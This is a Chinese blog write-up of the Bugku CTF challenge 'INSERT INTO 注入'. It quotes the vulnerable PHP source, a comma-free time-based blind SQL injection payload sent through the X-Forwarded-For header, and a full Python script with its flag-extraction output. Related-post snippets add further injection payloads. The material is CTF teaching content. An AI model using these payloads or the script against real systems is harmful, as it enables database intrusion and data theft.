Bugku-INSERT INTO 注入

最新推荐文章于 2024-07-03 07:00:00 发布
最新推荐文章于 2024-07-03 07:00:00 发布
阅读量952 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/84576303
版权

INSERT INTO 注入

原题链接

http://120.24.86.145:8002/web15/

分析

题目给出源码

<?php
error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];     //XFF优先
}else{
$ip = $_SERVER['REMOTE_ADDR'];      //否则REMOTE_ADDR
}
$ip_arr = explode(',', $ip);        //过滤','
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";       //insert into注入点
mysql_query($sql);
?>

在请求中的X-Forwarded-For字段可以进行注入,但是这里被过滤了。

可以看到,这是X-Forwarded-For的注入,而且过滤了逗号,。在过滤了逗号的情况下,我们就不能使用if语句了,在mysql中与if有相同功效的就是:

select case when (条件) then 代码1 else 代码 2 end;

而且由于逗号,被过滤,我们就不能使用substr、substring了,但我们可以使用:from 1 for 1,所以最终我们的payload如下:

127.0.0.1'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))-- +

python脚本:

# -*- coding:utf-8 -*-
import requests
import sys
# 基于时间的盲注,过滤了逗号 ,
sql = "127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
url = 'http://120.24.86.145:8002/web15/'
flag = ''
for i in range(1, 40):
    print('正在猜测:', str(i))
    for ch in range(32, 129):
        if ch == 128:
            sys.exit(0)
        sqli = sql.format(i, chr(ch))
        # print(sqli)
        header = {
            'X-Forwarded-For': sqli
        }
        try:
            html = requests.get(url, headers=header, timeout=3)
        except:
            flag += chr(ch)
            print(flag)
            break

运行结果:

正在猜测: 1
C
正在猜测: 2
CD
正在猜测: 3
CDB
正在猜测: 4
CDBF
正在猜测: 5
CDBF1
正在猜测: 6
CDBF14
...
...
正在猜测: 28
CDBF14C9551D5BE5612F7BB5D286
正在猜测: 29
CDBF14C9551D5BE5612F7BB5D2867
正在猜测: 30
CDBF14C9551D5BE5612F7BB5D28678
正在猜测: 31
CDBF14C9551D5BE5612F7BB5D286785
正在猜测: 32
CDBF14C9551D5BE5612F7BB5D2867853

flag

flag{cdbf14c9551d5be5612f7bb5d2867853}

知识点

时间盲注,XXF,insert into 注入

参考链接

https://delcoding.github.io/2018/03/bugku-writeup3/

「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bugku INSERT INTO注入(基于时间的盲注,详细教程)
wssmiss的博客
07-22 1424
题目 链接地址:http://123.206.87.240:8002/web15/ 分析 打开页面后: 分析页面的php代码 通过源码分析,注入点在x-forwarded-for:client,proxy1,proxy2的clienr处。获取用户ip,并把ip插入到client_ip表中的ip列中 因为源码第一行,关闭了错误报告,所以没有回显。在此采取基于时间的盲注 ...
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 6万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
8.SQL注入-基于insert,update利用案例
最新发布
愿听风成曲
07-03 838
sql语句正常插入表中的数据例如插入小强数据,如图所示:采用or这个运算符,构造闭合语句‘xiaoqinag’ or __ or 中后面的那个or后的单引号是为了闭合掉语句后面本身带有的单引号。而前面第一个or后是我们要填的注入语句。这里还是用后台报错的方法来构造payload,且有必要提到的是,这里我们还用的了updatexmal()基于insert语句下的报错:暴库payload语句。
bugku------INSERT INTO 注入
bylfsj的博客
09-30 481
原创 bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本) ...
bugku-web-insert into 注入
realstarstarli的博客
08-09 228
insert into 注入 题目分析 题目地址http://123.206.87.240:8002/web15/ 首先题目中已经给出了php源码,先分析一下。我在原来的代码上做了一些修改,便于调试操作。 <?php //隐藏报错信息 error_reporting(0); // 函数功能获取用户的ip地址 function getIp() { // PHP使用$_SERVER['HTTP_X_FORWARDED_FOR']获取IP //
bugku学习之37.insert into注入
s11show_163的博客
03-04 603
考察: xff头注入 insert into 注入格式是1'+(注入语句)# 延时注入 逗号屏蔽$ip_arr = explode(',', $ip);下无法使用if注入以及对substr函数修改引出的启发 给出了源码提示: <?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_...
bugku web题INSERT INTO注入.docx
05-16
### bugku Web题INSERT INTO注入知识点详解 #### 一、背景与目标 在CTF(Capture The Flag)比赛中,Web安全挑战是常见的题型之一。本文档中的“bugku web题INSERT INTO注入”是一个典型的利用SQL注入漏洞进行攻击...
解析mysqldump的delay-insert选项
09-10
《深入解析mysqldump的delayed-insert选项》 MySQL的mysqldump工具是数据库备份和恢复的重要组件,它提供了丰富的选项以满足各种备份需求。在这些选项中,`delayed-insert`是一个值得注意的功能,它允许在不锁定表...
elasticsearch-bulk-insert-plugin.zip
12-07
ETL工具kettle7.1抽取数据目前不支持elasticsearch 2.X以上版本,如果想要支持elasticsearch 6.X以上版本,必须替换elasticsearch-bulk-insert-plugin插件,该资源提供该插件的替换。 具体步骤为在spoon kettle\data-...
解析MySQL中INSERT INTO SELECT的使用
09-10
MySQL中的`INSERT INTO SELECT`语句是一种非常实用的数据库操作,它允许你从一个或多个数据源中选择数据,并将其插入到另一个表中。这种操作在数据迁移、数据整合或者生成汇总报告时非常常见。下面将详细介绍`INSERT...
bugku-INSERT INTO注入(附代码) 详细
偷一个月亮
06-19 657
# -*-coding:utf-8-*- # author : wen # flag:wen{b7bb30b3435f2e7c418b131f9e789f81} import requests import time url = 'http://123.206.87.240:8002/web15/' payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHI...
CTF - BugkuCTF-insert into注入
Blood_Pupil的博客
10-23 1168
代码如下 # -*- coding:utf-8 -*- import requests #&quot;database()&quot; 5 web15 确定数据库 #&quot;(select group_concat(table_name) from information_schema.tables where table_schema='web15')&quot; 14 client_ip,flag 确定表名 #&quot;(select...
php+insert+into+注入,PHP注入总结(写给自己)
weixin_36087083的博客
03-10 1684
' or 1=1' or '1=1'/*'%23' and password='mypassid=-1 union select 1,1,1id=-1 union select char(97),char(97),char(97)id=1 union select 1,1,1 from membersid=1 union select 1,1,1 from adminid=1 union sele...
bugku ctf 实战1-注入
qq_42777804的博客
08-17 663
打开之后,是这么一个网站   需要找到可以注入的网页 经过笔者的不断努力  终于自己给找了出来。。。(其实御剑可以直接扫出来的)     之后再点击这里      之后就会有这个注入点   http://www.interplay.com/support/support.php?id=374 常规注入发现是数字型 http://www.interplay...
BUGKu中的Insert注入
Mikasa
03-28 640
这道题因为是先输出的IP的信息,然后再将IP存入了数据库中,并且关闭了所有的报错提示。 因此用时间注入的方式比较好 首先我们先认识一个新的Python中的time模块,time.time()返回当前的时间,只要我们在发送数据包之前以及收到返回包之后各设置一个,就可以通过判断两时间之差确认我们判断的字符!!!! 其实没有什么难的,有相对好点的其他语言基础,相信能很快写出来 当然这道题还不是简单的时...
insert 语句_CTF从入门到提升(七)insert 等数据表相关操作注入及例题分享
weixin_39607836的博客
12-01 219
insert语法介绍insert插入到某张表中,后面跟上设置的参数以及值。在insert的时候可以使用哪些注入方法呢?比如这个报错的方法,如果报错可以使用,那么同理其他函数也是可以使用的。首先看下语句使用,如下图:update 语法介绍update 即对整张表做数据更新我们在set 这个位置做一个注入,报错后可以带出数据:delete语法介绍delete即删除表中的数据例如我删除id=7的数据例...
1-3DML语言与INsert注入逻辑
山兔的博客
12-09 717
1.什么DML? DML:数据操作语言(data manipulation language) 功能:主要是对表、视图等对象进行查询、插入、更新和删除操作,如果我们没有特殊的说明,主要是对表的操作 包括: SELECT 查询 INSERT 插入 UPDATE 更新 DELETE 删除 实战演示 打开kali的终端,输入mysql -uroot,访问mysql数据库 我们这篇文章演示要用到一个示例的数据库,我们自己创一个数据库。create database hxf default charset utf8
CTF之Bugku insert into注入
weixin_41607190的博客
01-07 369
原理:x-forwared-for注入,时间盲注,insert注入 点开网址就是这么一句话,源码也给出 function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; #从x-forwared-for获取ip }else{ $ip =...
【ctf】sql注入——insert、update和delete注入
wlllllianqing的博客
10-03 789
insert、update和delete注入 insert:插入语法 insert into 表名 (参数1,参数2,参数3) values (x,y,z); 注入语句: insert into user (id, username,password) values ('4','w64654ll'or updatexml(1,concat(0x7e,database()),0),'233'); update:更新语法 update 表名 set 列名1= x where 列名2 =y 列名1:
insert into注入
09-11
"insert into" 是一种 SQL 语句,用于将数据插入到数据库表中。然而,如果不正确使用,它可能会导致注入攻击。注入攻击是一种利用不正确的输入验证或不安全的查询构造来在应用程序中插入恶意代码的攻击方式。这可能会导致数据泄露、操纵数据库、执行恶意操作等安全问题。 要防止注入攻击,可以采取以下几个措施: 1. 使用参数化查询或预编译语句:使用参数化查询可以防止用户输入直接被解释为代码的一部分。参数化查询将用户提供的值视为纯粹的数据,而不是可执行的代码。 2. 输入验证和过滤:验证和过滤用户输入是非常重要的步骤。确保只接受预期类型和格式的输入,并剔除潜在的恶意代码。 3. 最小权限原则:为数据库和应用程序的用户分配最小权限,以限制攻击者对系统的操纵能力。 4. 安全编码实践:使用安全编码实践来编写和维护应用程序,例如避免拼接用户输入和动态生成 SQL 查询语句。 通过采取这些措施,可以有效地减少注入攻击的风险,并提高应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值